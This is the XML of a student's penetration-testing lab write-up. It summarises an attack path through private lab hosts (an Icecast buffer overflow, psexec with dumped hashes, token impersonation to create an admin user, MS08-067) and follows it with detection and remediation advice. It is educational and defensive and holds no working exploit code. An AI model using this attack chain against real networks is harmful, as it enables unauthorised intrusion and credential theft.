        <w:t xml:space="preserve"> group members to capture a screenshot of it for</w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t xml:space="preserve"> their</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> final write-up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCE1AF" w14:textId="77777777" w:rsidR="006F1EAC" w:rsidRDefault="006F1EAC" w:rsidP="006F1EAC"/>
    <w:p w14:paraId="010CB7BF" w14:textId="11880BC3" w:rsidR="006F1EAC" w:rsidRPr="003121C8" w:rsidRDefault="006F1EAC" w:rsidP="006F1EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What were the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vulnerabilies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> you exploited to create your path through the network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F246EFA" w14:textId="77777777" w:rsidR="006F1EAC" w:rsidRPr="009155AC" w:rsidRDefault="006F1EAC" w:rsidP="006F1EAC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C84A601" w14:textId="5A761020" w:rsidR="006F1EAC" w:rsidRDefault="006F1EAC" w:rsidP="006F1EAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icecast_header:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1EAC">
        <w:t xml:space="preserve">y exploiting a buffer overflow vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve">present </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1EAC">
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F1EAC">
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F1EAC">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used on </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>91.203.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D63C94" w14:textId="1867EB71" w:rsidR="006F1EAC" w:rsidRDefault="003121C8" w:rsidP="006F1EAC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p</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC" w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F1EAC" w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and psexec_ms17:</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> Used to authenticate and gain further access using </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve"> and others</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> obtained from the </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>hash dumps</w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t xml:space="preserve"> on 192.168.91.22, 91.1 and 92.31.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36918968" w14:textId="51960DA2" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="006F1EAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">impersonation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>okens:</w:t>
      </w:r>
      <w:r w:rsidRPr="003121C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">using incognito extension </w:t>
      </w:r>
      <w:r w:rsidRPr="003121C8">
        <w:t>impersonat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ed as other available </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve">token </w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="003121C8">
        <w:t xml:space="preserve"> to escalate privileges</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and create admin user</w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009155AC">
        <w:t>sujit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve">MEDINASOD server using “Jeffrey” token on </w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t>192.168.91.22.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E8A22" w14:textId="371789E1" w:rsidR="006F1EAC" w:rsidRDefault="003121C8" w:rsidP="006F1EAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ms08_067_netapi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="009155AC" w:rsidRPr="006F1EAC">
        <w:t xml:space="preserve">y exploiting </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">remote code </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t xml:space="preserve">executing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">through a </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">erver </w:t>
      </w:r>
      <w:r w:rsidR="009155AC">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ervice vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t xml:space="preserve"> on 192.168.93.100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6890EC95" w14:textId="77777777" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="003121C8"/>
    <w:p w14:paraId="28F2075E" w14:textId="77777777" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853C53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How would you detect and remediate these vulnerabilities in a real network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282067F5" w14:textId="0C9378BB" w:rsidR="00DD53B1" w:rsidRPr="00853C53" w:rsidRDefault="00DD53B1" w:rsidP="003121C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How would you detect the use of these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vulnerabilies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in a real network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681163E8" w14:textId="77777777" w:rsidR="003121C8" w:rsidRPr="00853C53" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010C32B7" w14:textId="496CC72F" w:rsidR="002626EF" w:rsidRPr="00DD53B1" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For detection</w:t>
      </w:r>
      <w:r w:rsidR="00DD53B1" w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/use</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDF36B" w14:textId="5E4AFE39" w:rsidR="002626EF" w:rsidRDefault="002626EF" w:rsidP="002626EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implementing monitoring tools like SIEM systems and network traffic scanners</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t xml:space="preserve"> for unusual activity, including unexpected file transfers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4A23D" w14:textId="7E07AA18" w:rsidR="002626EF" w:rsidRDefault="002626EF" w:rsidP="002626EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Doing regular vulnerability scans to identify weaknesses</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t xml:space="preserve"> and misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76106AB2" w14:textId="572B0F1E" w:rsidR="002626EF" w:rsidRDefault="002626EF" w:rsidP="002626EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Monitor authentication logs for suspicious logins, privilege escalation and abnormal traffic (SMB/port: 445)</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DD1CC0" w14:textId="1D0D32B5" w:rsidR="002626EF" w:rsidRDefault="002626EF" w:rsidP="002626EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use endpoint detection tools to track and analyze suspicious processes (new processes with random name</w:t>
      </w:r>
      <w:r w:rsidR="00DD53B1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD53B1">
        <w:t>etc.</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32B569" w14:textId="7D63EEFD" w:rsidR="003121C8" w:rsidRDefault="002626EF" w:rsidP="002626EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Inspect network traffic for unusual packets and patterns</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528F01A" w14:textId="2165C7D6" w:rsidR="003121C8" w:rsidRPr="00DD53B1" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Methods to remediat</w:t>
      </w:r>
      <w:r w:rsidR="002626EF" w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD53B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E08BB63" w14:textId="27118500" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep services updated and apply security patches</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7134F569" w14:textId="09F214B8" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable unused services</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDEC7C" w14:textId="43B80334" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="003121C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enable multi-factor authentication</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0037126B">
        <w:t xml:space="preserve">(MFA) </w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="006905D8">
        <w:t xml:space="preserve"> logout</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t xml:space="preserve"> policy like auto logout</w:t>
      </w:r>
      <w:r w:rsidR="0037126B">
        <w:t xml:space="preserve"> or renew the session</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t xml:space="preserve"> after </w:t>
      </w:r>
      <w:r w:rsidR="006905D8">
        <w:t>few</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t xml:space="preserve"> minutes of inactivity</w:t>
      </w:r>
      <w:r w:rsidR="006905D8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E081F94" w14:textId="662826A4" w:rsidR="003121C8" w:rsidRDefault="003121C8" w:rsidP="002626EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block any privilege escalation attempts </w:t>
      </w:r>
      <w:r w:rsidR="002626EF">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r>
        <w:t>principle of least privilege</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE38C8" w14:textId="204AC2F9" w:rsidR="007329A8" w:rsidRDefault="003121C8" w:rsidP="007329A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Isolate networks to limit lateral movement</w:t>
      </w:r>
      <w:r w:rsidR="00326FC5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEDCE2" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8"/>
    <w:p w14:paraId="68E0DC18" w14:textId="01D5181F" w:rsidR="0013187F" w:rsidRPr="00853C53" w:rsidRDefault="0013187F" w:rsidP="0013187F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013187F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What was your biggest lesson learned from the exercise?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15687257" w14:textId="77777777" w:rsidR="0013187F" w:rsidRPr="009155AC" w:rsidRDefault="0013187F" w:rsidP="0013187F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C155168" w14:textId="6EFC68C3" w:rsidR="0013187F" w:rsidRPr="00426FE3" w:rsidRDefault="006905D8" w:rsidP="00281EDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve">The biggest lesson learned is the critical role </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">played by </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>misconfigurat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ions and </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>outdated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> software and</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve"> services in network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>And s</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>imple oversights like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>improperly managed SMB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (445) ports/services</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve">, and weak access controls can create paths for exploitation. The absence of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">proper policy for login and </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>MFA allowed easy credential-based attacks</w:t>
      </w:r>
      <w:r>
        <w:t>. And</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve"> unused services </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that are active also </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>provided additional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities to exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Also learned the </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve">importance of logging out of privileged </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or any active </w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>sessions, as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> these</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t xml:space="preserve"> tokens can be exploited for </w:t>
      </w:r>
      <w:r w:rsidR="00DD53B1" w:rsidRPr="006905D8">
        <w:t>impersonation</w:t>
      </w:r>
      <w:r w:rsidR="00DD53B1">
        <w:t>-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privilege escalation attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="006905D8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0013187F" w:rsidRPr="00426FE3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318C2C" w14:textId="77777777" w:rsidR="00A461E8" w:rsidRDefault="00A461E8" w:rsidP="0069083C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0EEC21D4" w14:textId="77777777" w:rsidR="00A461E8" w:rsidRDefault="00A461E8" w:rsidP="006908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322031" w14:textId="77777777" w:rsidR="00A461E8" w:rsidRDefault="00A461E8" w:rsidP="0069083C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28DB6E4D" w14:textId="77777777" w:rsidR="00A461E8" w:rsidRDefault="00A461E8" w:rsidP="006908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45BD3A" w14:textId="16CFE65E" w:rsidR="0069083C" w:rsidRDefault="0069083C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>GWID: G33820054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141087"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C13A67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86494D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1DAFE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522C45A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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724025"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C706C7A"/>
    <w:lvl w:ilvl="0" w:tplc="0EAAF126">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A62EC84E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6DBA11FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto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4740102">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="360782955">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="4270432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83C"/>
    <w:rsid w:val="000762AE"/>
    <w:rsid w:val="000E04FC"/>
    <w:rsid w:val="0013187F"/>
    <w:rsid w:val="002219A2"/>
    <w:rsid w:val="002626EF"/>
    <w:rsid w:val="002804BD"/>
    <w:rsid w:val="002C1244"/>
    <w:rsid w:val="002C3EF2"/>
    <w:rsid w:val="003121C8"/>
    <w:rsid w:val="00326FC5"/>
    <w:rsid w:val="0037126B"/>
    <w:rsid w:val="004244CF"/>
    <w:rsid w:val="00426FE3"/>
    <w:rsid w:val="00461398"/>
    <w:rsid w:val="00495FA7"/>
    <w:rsid w:val="004E39AE"/>
    <w:rsid w:val="0053008B"/>
    <w:rsid w:val="00587BF0"/>
    <w:rsid w:val="005A3D59"/>
    <w:rsid w:val="005B0202"/>
    <w:rsid w:val="005B6170"/>
    <w:rsid w:val="005F107C"/>
    <w:rsid w:val="00625FFC"/>
    <w:rsid w:val="00626A0D"/>
    <w:rsid w:val="00661E4C"/>
    <w:rsid w:val="00675146"/>
    <w:rsid w:val="006905D8"/>
    <w:rsid w:val="0069083C"/>
    <w:rsid w:val="006D534F"/>
    <w:rsid w:val="006E3357"/>
    <w:rsid w:val="006F1EAC"/>
    <w:rsid w:val="007329A8"/>
    <w:rsid w:val="007A4D53"/>
    <w:rsid w:val="008372C5"/>
    <w:rsid w:val="008524A2"/>
    <w:rsid w:val="00853C53"/>
    <w:rsid w:val="00857B1B"/>
    <w:rsid w:val="009155AC"/>
    <w:rsid w:val="0095055D"/>
    <w:rsid w:val="00A461E8"/>
    <w:rsid w:val="00AA03B0"/>
    <w:rsid w:val="00AE74D2"/>
    <w:rsid w:val="00B536FA"/>
    <w:rsid w:val="00B64147"/>
    <w:rsid w:val="00C83727"/>
    <w:rsid w:val="00D23CA2"/>
    <w:rsid w:val="00D707E2"/>
    <w:rsid w:val="00DA519A"/>
    <w:rsid w:val="00DB2232"/>
    <w:rsid w:val="00DD53B1"/>
    <w:rsid w:val="00E203B6"/>
    <w:rsid w:val="00EB376A"/>
    <w:rsid w:val="00EB71E5"/>
    <w:rsid w:val="00F22AAA"/>
    <w:rsid w:val="00F30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43B00"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{92F593FF-A7F8-AA46-8527-CBAFF794E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083C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006908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08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08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08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08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083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083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083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083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08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08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08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08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08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08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08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08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08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083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08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083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08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083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08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08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08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08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08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083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9083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083C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0069083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08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81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</TotalTime>
  <Pages>9</Pages>
  <Words>1432</Words>
  <Characters>8163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Dwarsala, Sujith</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dwarsala, Sujith</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2024-12-17T05:30:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-14T20:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-17T18:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>